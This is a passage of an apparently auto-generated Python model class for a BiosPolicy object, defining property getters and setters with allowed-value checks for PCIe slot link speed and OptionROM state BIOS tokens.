:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot5state not in allowed_values:
raise ValueError(
"Invalid value for `slot5state` ({0}), must be one of {1}"
.format(slot5state, allowed_values)
)
self._slot5state = slot5state
@property
def slot6link_speed(self):
"""
Gets the slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:6 Link Speed configuration
:return: The slot6link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot6link_speed
@slot6link_speed.setter
def slot6link_speed(self, slot6link_speed):
"""
Sets the slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:6 Link Speed configuration
:param slot6link_speed: The slot6link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot6link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot6link_speed` ({0}), must be one of {1}"
.format(slot6link_speed, allowed_values)
)
self._slot6link_speed = slot6link_speed
@property
def slot6state(self):
"""
Gets the slot6state of this BiosPolicy.
BIOS Token for setting Slot 6 state configuration
:return: The slot6state of this BiosPolicy.
:rtype: str
"""
return self._slot6state
@slot6state.setter
def slot6state(self, slot6state):
"""
Sets the slot6state of this BiosPolicy.
BIOS Token for setting Slot 6 state configuration
:param slot6state: The slot6state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot6state not in allowed_values:
raise ValueError(
"Invalid value for `slot6state` ({0}), must be one of {1}"
.format(slot6state, allowed_values)
)
self._slot6state = slot6state
@property
def slot7link_speed(self):
"""
Gets the slot7link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:7 Link Speed configuration
:return: The slot7link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot7link_speed
@slot7link_speed.setter
def slot7link_speed(self, slot7link_speed):
"""
Sets the slot7link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:7 Link Speed configuration
:param slot7link_speed: The slot7link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot7link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot7link_speed` ({0}), must be one of {1}"
.format(slot7link_speed, allowed_values)
)
self._slot7link_speed = slot7link_speed
@property
def slot7state(self):
"""
Gets the slot7state of this BiosPolicy.
BIOS Token for setting Slot 7 state configuration
:return: The slot7state of this BiosPolicy.
:rtype: str
"""
return self._slot7state
@slot7state.setter
def slot7state(self, slot7state):
"""
Sets the slot7state of this BiosPolicy.
BIOS Token for setting Slot 7 state configuration
:param slot7state: The slot7state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot7state not in allowed_values:
raise ValueError(
"Invalid value for `slot7state` ({0}), must be one of {1}"
.format(slot7state, allowed_values)
)
self._slot7state = slot7state
@property
def slot8link_speed(self):
"""
Gets the slot8link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:8 Link Speed configuration
:return: The slot8link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot8link_speed
@slot8link_speed.setter
def slot8link_speed(self, slot8link_speed):
"""
Sets the slot8link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:8 Link Speed configuration
:param slot8link_speed: The slot8link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot8link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot8link_speed` ({0}), must be one of {1}"
.format(slot8link_speed, allowed_values)
)
self._slot8link_speed = slot8link_speed
@property
def slot8state(self):
"""
Gets the slot8state of this BiosPolicy.
BIOS Token for setting Slot 8 state configuration
:return: The slot8state of this BiosPolicy.
:rtype: str
"""
return self._slot8state
@slot8state.setter
def slot8state(self, slot8state):
"""
Sets the slot8state of this BiosPolicy.
BIOS Token for setting Slot 8 state configuration
:param slot8state: The slot8state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot8state not in allowed_values:
raise ValueError(
"Invalid value for `slot8state` ({0}), must be one of {1}"
.format(slot8state, allowed_values)
)
self._slot8state = slot8state
@property
def slot9link_speed(self):
"""
Gets the slot9link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:9 Link Speed configuration
:return: The slot9link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot9link_speed
@slot9link_speed.setter
def slot9link_speed(self, slot9link_speed):
"""
Sets the slot9link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:9 Link Speed configuration
:param slot9link_speed: The slot9link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot9link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot9link_speed` ({0}), must be one of {1}"
.format(slot9link_speed, allowed_values)
)
self._slot9link_speed = slot9link_speed
@property
def slot9state(self):
"""
Gets the slot9state of this BiosPolicy.
BIOS Token for setting Slot 9 state configuration
:return: The slot9state of this BiosPolicy.
:rtype: str
"""
return self._slot9state
@slot9state.setter
def slot9state(self, slot9state):
"""
Sets the slot9state of this BiosPolicy.
BIOS Token for setting Slot 9 state configuration
:param slot9state: The slot9state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot9state not in allowed_values:
raise ValueError(
"Invalid value for `slot9state` ({0}), must be one of {1}"
.format(slot9state, allowed_values)
)
self._slot9state = slot9state
@property
def slot_flom_link_speed(self):
"""
Gets the slot_flom_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FLOM Link Speed configuration
:return: The slot_flom_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_flom_link_speed
@slot_flom_link_speed.setter
def slot_flom_link_speed(self, slot_flom_link_speed):
"""
Sets the slot_flom_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:FLOM Link Speed configuration
:param slot_flom_link_speed: The slot_flom_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_flom_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_flom_link_speed` ({0}), must be one of {1}"
.format(slot_flom_link_speed, allowed_values)
)
self._slot_flom_link_speed = slot_flom_link_speed
@property
def slot_front_nvme1link_speed(self):
"""
Gets the slot_front_nvme1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front Nvme1 Link Speed configuration
:return: The slot_front_nvme1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_front_nvme1link_speed
@slot_front_nvme1link_speed.setter
def slot_front_nvme1link_speed(self, slot_front_nvme1link_speed):
"""
Sets the slot_front_nvme1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front Nvme1 Link Speed configuration
:param slot_front_nvme1link_speed: The slot_front_nvme1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_front_nvme1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_front_nvme1link_speed` ({0}), must be one of {1}"
.format(slot_front_nvme1link_speed, allowed_values)
)
self._slot_front_nvme1link_speed = slot_front_nvme1link_speed
@property
def slot_front_nvme2link_speed(self):
"""
Gets the slot_front_nvme2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front Nvme2 Link Speed configuration
:return: The slot_front_nvme2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_front_nvme2link_speed
@slot_front_nvme2link_speed.setter
def slot_front_nvme2link_speed(self, slot_front_nvme2link_speed):
"""
Sets the slot_front_nvme2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front Nvme2 Link Speed configuration
:param slot_front_nvme2link_speed: The slot_front_nvme2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_front_nvme2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_front_nvme2link_speed` ({0}), must be one of {1}"
.format(slot_front_nvme2link_speed, allowed_values)
)
self._slot_front_nvme2link_speed = slot_front_nvme2link_speed
@property
def slot_front_slot5link_speed(self):
"""
Gets the slot_front_slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front1 Link Speed configuration
:return: The slot_front_slot5link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_front_slot5link_speed
@slot_front_slot5link_speed.setter
def slot_front_slot5link_speed(self, slot_front_slot5link_speed):
"""
Sets the slot_front_slot5link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front1 Link Speed configuration
:param slot_front_slot5link_speed: The slot_front_slot5link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_front_slot5link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_front_slot5link_speed` ({0}), must be one of {1}"
.format(slot_front_slot5link_speed, allowed_values)
)
self._slot_front_slot5link_speed = slot_front_slot5link_speed
@property
def slot_front_slot6link_speed(self):
"""
Gets the slot_front_slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front2 Link Speed configuration
:return: The slot_front_slot6link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_front_slot6link_speed
@slot_front_slot6link_speed.setter
def slot_front_slot6link_speed(self, slot_front_slot6link_speed):
"""
Sets the slot_front_slot6link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Front2 Link Speed configuration
:param slot_front_slot6link_speed: The slot_front_slot6link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_front_slot6link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_front_slot6link_speed` ({0}), must be one of {1}"
.format(slot_front_slot6link_speed, allowed_values)
)
self._slot_front_slot6link_speed = slot_front_slot6link_speed
@property
def slot_hba_link_speed(self):
"""
Gets the slot_hba_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:HBA Link Speed configuration
:return: The slot_hba_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_hba_link_speed
@slot_hba_link_speed.setter
def slot_hba_link_speed(self, slot_hba_link_speed):
"""
Sets the slot_hba_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:HBA Link Speed configuration
:param slot_hba_link_speed: The slot_hba_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_hba_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_hba_link_speed` ({0}), must be one of {1}"
.format(slot_hba_link_speed, allowed_values)
)
self._slot_hba_link_speed = slot_hba_link_speed
@property
def slot_hba_state(self):
"""
Gets the slot_hba_state of this BiosPolicy.
BIOS Token for setting PCIe Slot:HBA OptionROM configuration
:return: The slot_hba_state of this BiosPolicy.
:rtype: str
"""
return self._slot_hba_state
@slot_hba_state.setter
def slot_hba_state(self, slot_hba_state):
"""
Sets the slot_hba_state of this BiosPolicy.
BIOS Token for setting PCIe Slot:HBA OptionROM configuration
:param slot_hba_state: The slot_hba_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_hba_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_hba_state` ({0}), must be one of {1}"
.format(slot_hba_state, allowed_values)
)
self._slot_hba_state = slot_hba_state
@property
def slot_lom1link(self):
"""
Gets the slot_lom1link of this BiosPolicy.
BIOS Token for setting PCIe LOM:1 Link configuration
:return: The slot_lom1link of this BiosPolicy.
:rtype: str
"""
return self._slot_lom1link
@slot_lom1link.setter
def slot_lom1link(self, slot_lom1link):
"""
Sets the slot_lom1link of this BiosPolicy.
BIOS Token for setting PCIe LOM:1 Link configuration
:param slot_lom1link: The slot_lom1link of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_lom1link not in allowed_values:
raise ValueError(
"Invalid value for `slot_lom1link` ({0}), must be one of {1}"
.format(slot_lom1link, allowed_values)
)
self._slot_lom1link = slot_lom1link
@property
def slot_lom2link(self):
"""
Gets the slot_lom2link of this BiosPolicy.
BIOS Token for setting PCIe LOM:2 Link configuration
:return: The slot_lom2link of this BiosPolicy.
:rtype: str
"""
return self._slot_lom2link
@slot_lom2link.setter
def slot_lom2link(self, slot_lom2link):
"""
Sets the slot_lom2link of this BiosPolicy.
BIOS Token for setting PCIe LOM:2 Link configuration
:param slot_lom2link: The slot_lom2link of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_lom2link not in allowed_values:
raise ValueError(
"Invalid value for `slot_lom2link` ({0}), must be one of {1}"
.format(slot_lom2link, allowed_values)
)
self._slot_lom2link = slot_lom2link
@property
def slot_mezz_state(self):
"""
Gets the slot_mezz_state of this BiosPolicy.
BIOS Token for setting Slot Mezz state configuration
:return: The slot_mezz_state of this BiosPolicy.
:rtype: str
"""
return self._slot_mezz_state
@slot_mezz_state.setter
def slot_mezz_state(self, slot_mezz_state):
"""
Sets the slot_mezz_state of this BiosPolicy.
BIOS Token for setting Slot Mezz state configuration
:param slot_mezz_state: The slot_mezz_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_mezz_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_mezz_state` ({0}), must be one of {1}"
.format(slot_mezz_state, allowed_values)
)
self._slot_mezz_state = slot_mezz_state
@property
def slot_mlom_link_speed(self):
"""
Gets the slot_mlom_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:MLOM Link Speed configuration
:return: The slot_mlom_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_mlom_link_speed
@slot_mlom_link_speed.setter
def slot_mlom_link_speed(self, slot_mlom_link_speed):
"""
Sets the slot_mlom_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:MLOM Link Speed configuration
:param slot_mlom_link_speed: The slot_mlom_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_mlom_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_mlom_link_speed` ({0}), must be one of {1}"
.format(slot_mlom_link_speed, allowed_values)
)
self._slot_mlom_link_speed = slot_mlom_link_speed
@property
def slot_mlom_state(self):
"""
Gets the slot_mlom_state of this BiosPolicy.
BIOS Token for setting PCIe Slot MLOM OptionROM configuration
:return: The slot_mlom_state of this BiosPolicy.
:rtype: str
"""
return self._slot_mlom_state
@slot_mlom_state.setter
def slot_mlom_state(self, slot_mlom_state):
"""
Sets the slot_mlom_state of this BiosPolicy.
BIOS Token for setting PCIe Slot MLOM OptionROM configuration
:param slot_mlom_state: The slot_mlom_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_mlom_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_mlom_state` ({0}), must be one of {1}"
.format(slot_mlom_state, allowed_values)
)
self._slot_mlom_state = slot_mlom_state
@property
def slot_mraid_link_speed(self):
"""
Gets the slot_mraid_link_speed of this BiosPolicy.
BIOS Token for setting MRAID Link Speed configuration
:return: The slot_mraid_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_mraid_link_speed
@slot_mraid_link_speed.setter
def slot_mraid_link_speed(self, slot_mraid_link_speed):
"""
Sets the slot_mraid_link_speed of this BiosPolicy.
BIOS Token for setting MRAID Link Speed configuration
:param slot_mraid_link_speed: The slot_mraid_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_mraid_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_mraid_link_speed` ({0}), must be one of {1}"
.format(slot_mraid_link_speed, allowed_values)
)
self._slot_mraid_link_speed = slot_mraid_link_speed
@property
def slot_mraid_state(self):
"""
Gets the slot_mraid_state of this BiosPolicy.
BIOS Token for setting PCIe Slot MRAID OptionROM configuration
:return: The slot_mraid_state of this BiosPolicy.
:rtype: str
"""
return self._slot_mraid_state
@slot_mraid_state.setter
def slot_mraid_state(self, slot_mraid_state):
"""
Sets the slot_mraid_state of this BiosPolicy.
BIOS Token for setting PCIe Slot MRAID OptionROM configuration
:param slot_mraid_state: The slot_mraid_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_mraid_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_mraid_state` ({0}), must be one of {1}"
.format(slot_mraid_state, allowed_values)
)
self._slot_mraid_state = slot_mraid_state
@property
def slot_n10state(self):
"""
Gets the slot_n10state of this BiosPolicy.
BIOS Token for setting PCIe Slot N10 OptionROM configuration
:return: The slot_n10state of this BiosPolicy.
:rtype: str
"""
return self._slot_n10state
@slot_n10state.setter
def slot_n10state(self, slot_n10state):
"""
Sets the slot_n10state of this BiosPolicy.
BIOS Token for setting PCIe Slot N10 OptionROM configuration
:param slot_n10state: The slot_n10state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n10state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n10state` ({0}), must be one of {1}"
.format(slot_n10state, allowed_values)
)
self._slot_n10state = slot_n10state
@property
def slot_n11state(self):
"""
Gets the slot_n11state of this BiosPolicy.
BIOS Token for setting PCIe Slot N11 OptionROM configuration
:return: The slot_n11state of this BiosPolicy.
:rtype: str
"""
return self._slot_n11state
@slot_n11state.setter
def slot_n11state(self, slot_n11state):
"""
Sets the slot_n11state of this BiosPolicy.
BIOS Token for setting PCIe Slot N11 OptionROM configuration
:param slot_n11state: The slot_n11state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n11state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n11state` ({0}), must be one of {1}"
.format(slot_n11state, allowed_values)
)
self._slot_n11state = slot_n11state
@property
def slot_n12state(self):
"""
Gets the slot_n12state of this BiosPolicy.
BIOS Token for setting PCIe Slot N12 OptionROM configuration
:return: The slot_n12state of this BiosPolicy.
:rtype: str
"""
return self._slot_n12state
@slot_n12state.setter
def slot_n12state(self, slot_n12state):
"""
Sets the slot_n12state of this BiosPolicy.
BIOS Token for setting PCIe Slot N12 OptionROM configuration
:param slot_n12state: The slot_n12state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n12state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n12state` ({0}), must be one of {1}"
.format(slot_n12state, allowed_values)
)
self._slot_n12state = slot_n12state
@property
def slot_n13state(self):
"""
Gets the slot_n13state of this BiosPolicy.
BIOS Token for setting PCIe Slot N13 OptionROM configuration
:return: The slot_n13state of this BiosPolicy.
:rtype: str
"""
return self._slot_n13state
@slot_n13state.setter
def slot_n13state(self, slot_n13state):
"""
Sets the slot_n13state of this BiosPolicy.
BIOS Token for setting PCIe Slot N13 OptionROM configuration
:param slot_n13state: The slot_n13state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n13state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n13state` ({0}), must be one of {1}"
.format(slot_n13state, allowed_values)
)
self._slot_n13state = slot_n13state
@property
def slot_n14state(self):
"""
Gets the slot_n14state of this BiosPolicy.
BIOS Token for setting PCIe Slot N14 OptionROM configuration
:return: The slot_n14state of this BiosPolicy.
:rtype: str
"""
return self._slot_n14state
@slot_n14state.setter
def slot_n14state(self, slot_n14state):
"""
Sets the slot_n14state of this BiosPolicy.
BIOS Token for setting PCIe Slot N14 OptionROM configuration
:param slot_n14state: The slot_n14state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n14state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n14state` ({0}), must be one of {1}"
.format(slot_n14state, allowed_values)
)
self._slot_n14state = slot_n14state
@property
def slot_n15state(self):
"""
Gets the slot_n15state of this BiosPolicy.
BIOS Token for setting PCIe Slot N15 OptionROM configuration
:return: The slot_n15state of this BiosPolicy.
:rtype: str
"""
return self._slot_n15state
@slot_n15state.setter
def slot_n15state(self, slot_n15state):
"""
Sets the slot_n15state of this BiosPolicy.
BIOS Token for setting PCIe Slot N15 OptionROM configuration
:param slot_n15state: The slot_n15state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n15state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n15state` ({0}), must be one of {1}"
.format(slot_n15state, allowed_values)
)
self._slot_n15state = slot_n15state
@property
def slot_n16state(self):
"""
Gets the slot_n16state of this BiosPolicy.
BIOS Token for setting PCIe Slot N16 OptionROM configuration
:return: The slot_n16state of this BiosPolicy.
:rtype: str
"""
return self._slot_n16state
@slot_n16state.setter
def slot_n16state(self, slot_n16state):
"""
Sets the slot_n16state of this BiosPolicy.
BIOS Token for setting PCIe Slot N16 OptionROM configuration
:param slot_n16state: The slot_n16state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n16state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n16state` ({0}), must be one of {1}"
.format(slot_n16state, allowed_values)
)
self._slot_n16state = slot_n16state
@property
def slot_n17state(self):
"""
Gets the slot_n17state of this BiosPolicy.
BIOS Token for setting PCIe Slot N17 OptionROM configuration
:return: The slot_n17state of this BiosPolicy.
:rtype: str
"""
return self._slot_n17state
@slot_n17state.setter
def slot_n17state(self, slot_n17state):
"""
Sets the slot_n17state of this BiosPolicy.
BIOS Token for setting PCIe Slot N17 OptionROM configuration
:param slot_n17state: The slot_n17state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n17state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n17state` ({0}), must be one of {1}"
.format(slot_n17state, allowed_values)
)
self._slot_n17state = slot_n17state
@property
def slot_n18state(self):
"""
Gets the slot_n18state of this BiosPolicy.
BIOS Token for setting PCIe Slot N18 OptionROM configuration
:return: The slot_n18state of this BiosPolicy.
:rtype: str
"""
return self._slot_n18state
@slot_n18state.setter
def slot_n18state(self, slot_n18state):
"""
Sets the slot_n18state of this BiosPolicy.
BIOS Token for setting PCIe Slot N18 OptionROM configuration
:param slot_n18state: The slot_n18state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n18state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n18state` ({0}), must be one of {1}"
.format(slot_n18state, allowed_values)
)
self._slot_n18state = slot_n18state
@property
def slot_n19state(self):
"""
Gets the slot_n19state of this BiosPolicy.
BIOS Token for setting PCIe Slot N19 OptionROM configuration
:return: The slot_n19state of this BiosPolicy.
:rtype: str
"""
return self._slot_n19state
@slot_n19state.setter
def slot_n19state(self, slot_n19state):
"""
Sets the slot_n19state of this BiosPolicy.
BIOS Token for setting PCIe Slot N19 OptionROM configuration
:param slot_n19state: The slot_n19state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n19state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n19state` ({0}), must be one of {1}"
.format(slot_n19state, allowed_values)
)
self._slot_n19state = slot_n19state
@property
def slot_n1state(self):
"""
Gets the slot_n1state of this BiosPolicy.
BIOS Token for setting PCIe Slot N1 OptionROM configuration
:return: The slot_n1state of this BiosPolicy.
:rtype: str
"""
return self._slot_n1state
@slot_n1state.setter
def slot_n1state(self, slot_n1state):
"""
Sets the slot_n1state of this BiosPolicy.
BIOS Token for setting PCIe Slot N1 OptionROM configuration
:param slot_n1state: The slot_n1state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_n1state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n1state` ({0}), must be one of {1}"
.format(slot_n1state, allowed_values)
)
self._slot_n1state = slot_n1state
@property
def slot_n20state(self):
"""
Gets the slot_n20state of this BiosPolicy.
BIOS Token for setting PCIe Slot N20 OptionROM configuration
:return: The slot_n20state of this BiosPolicy.
:rtype: str
"""
return self._slot_n20state
@slot_n20state.setter
def slot_n20state(self, slot_n20state):
"""
Sets the slot_n20state of this BiosPolicy.
BIOS Token for setting PCIe Slot N20 OptionROM configuration
:param slot_n20state: The slot_n20state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n20state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n20state` ({0}), must be one of {1}"
.format(slot_n20state, allowed_values)
)
self._slot_n20state = slot_n20state
@property
def slot_n21state(self):
"""
Gets the slot_n21state of this BiosPolicy.
BIOS Token for setting PCIe Slot N21 OptionROM configuration
:return: The slot_n21state of this BiosPolicy.
:rtype: str
"""
return self._slot_n21state
@slot_n21state.setter
def slot_n21state(self, slot_n21state):
"""
Sets the slot_n21state of this BiosPolicy.
BIOS Token for setting PCIe Slot N21 OptionROM configuration
:param slot_n21state: The slot_n21state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n21state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n21state` ({0}), must be one of {1}"
.format(slot_n21state, allowed_values)
)
self._slot_n21state = slot_n21state
@property
def slot_n22state(self):
"""
Gets the slot_n22state of this BiosPolicy.
BIOS Token for setting PCIe Slot N22 OptionROM configuration
:return: The slot_n22state of this BiosPolicy.
:rtype: str
"""
return self._slot_n22state
@slot_n22state.setter
def slot_n22state(self, slot_n22state):
"""
Sets the slot_n22state of this BiosPolicy.
BIOS Token for setting PCIe Slot N22 OptionROM configuration
:param slot_n22state: The slot_n22state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n22state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n22state` ({0}), must be one of {1}"
.format(slot_n22state, allowed_values)
)
self._slot_n22state = slot_n22state
@property
def slot_n23state(self):
"""
Gets the slot_n23state of this BiosPolicy.
BIOS Token for setting PCIe Slot N23 OptionROM configuration
:return: The slot_n23state of this BiosPolicy.
:rtype: str
"""
return self._slot_n23state
@slot_n23state.setter
def slot_n23state(self, slot_n23state):
"""
Sets the slot_n23state of this BiosPolicy.
BIOS Token for setting PCIe Slot N23 OptionROM configuration
:param slot_n23state: The slot_n23state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n23state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n23state` ({0}), must be one of {1}"
.format(slot_n23state, allowed_values)
)
self._slot_n23state = slot_n23state
@property
def slot_n24state(self):
"""
Gets the slot_n24state of this BiosPolicy.
BIOS Token for setting PCIe Slot N24 OptionROM configuration
:return: The slot_n24state of this BiosPolicy.
:rtype: str
"""
return self._slot_n24state
@slot_n24state.setter
def slot_n24state(self, slot_n24state):
"""
Sets the slot_n24state of this BiosPolicy.
BIOS Token for setting PCIe Slot N24 OptionROM configuration
:param slot_n24state: The slot_n24state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n24state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n24state` ({0}), must be one of {1}"
.format(slot_n24state, allowed_values)
)
self._slot_n24state = slot_n24state
@property
def slot_n2state(self):
"""
Gets the slot_n2state of this BiosPolicy.
BIOS Token for setting PCIe Slot N2 OptionROM configuration
:return: The slot_n2state of this BiosPolicy.
:rtype: str
"""
return self._slot_n2state
@slot_n2state.setter
def slot_n2state(self, slot_n2state):
"""
Sets the slot_n2state of this BiosPolicy.
BIOS Token for setting PCIe Slot N2 OptionROM configuration
:param slot_n2state: The slot_n2state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_n2state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n2state` ({0}), must be one of {1}"
.format(slot_n2state, allowed_values)
)
self._slot_n2state = slot_n2state
@property
def slot_n3state(self):
"""
Gets the slot_n3state of this BiosPolicy.
BIOS Token for setting PCIe Slot N3 OptionROM configuration
:return: The slot_n3state of this BiosPolicy.
:rtype: str
"""
return self._slot_n3state
@slot_n3state.setter
def slot_n3state(self, slot_n3state):
"""
Sets the slot_n3state of this BiosPolicy.
BIOS Token for setting PCIe Slot N3 OptionROM configuration
:param slot_n3state: The slot_n3state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n3state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n3state` ({0}), must be one of {1}"
.format(slot_n3state, allowed_values)
)
self._slot_n3state = slot_n3state
@property
def slot_n4state(self):
"""
Gets the slot_n4state of this BiosPolicy.
BIOS Token for setting PCIe Slot N4 OptionROM configuration
:return: The slot_n4state of this BiosPolicy.
:rtype: str
"""
return self._slot_n4state
@slot_n4state.setter
def slot_n4state(self, slot_n4state):
"""
Sets the slot_n4state of this BiosPolicy.
BIOS Token for setting PCIe Slot N4 OptionROM configuration
:param slot_n4state: The slot_n4state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n4state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n4state` ({0}), must be one of {1}"
.format(slot_n4state, allowed_values)
)
self._slot_n4state = slot_n4state
@property
def slot_n5state(self):
"""
Gets the slot_n5state of this BiosPolicy.
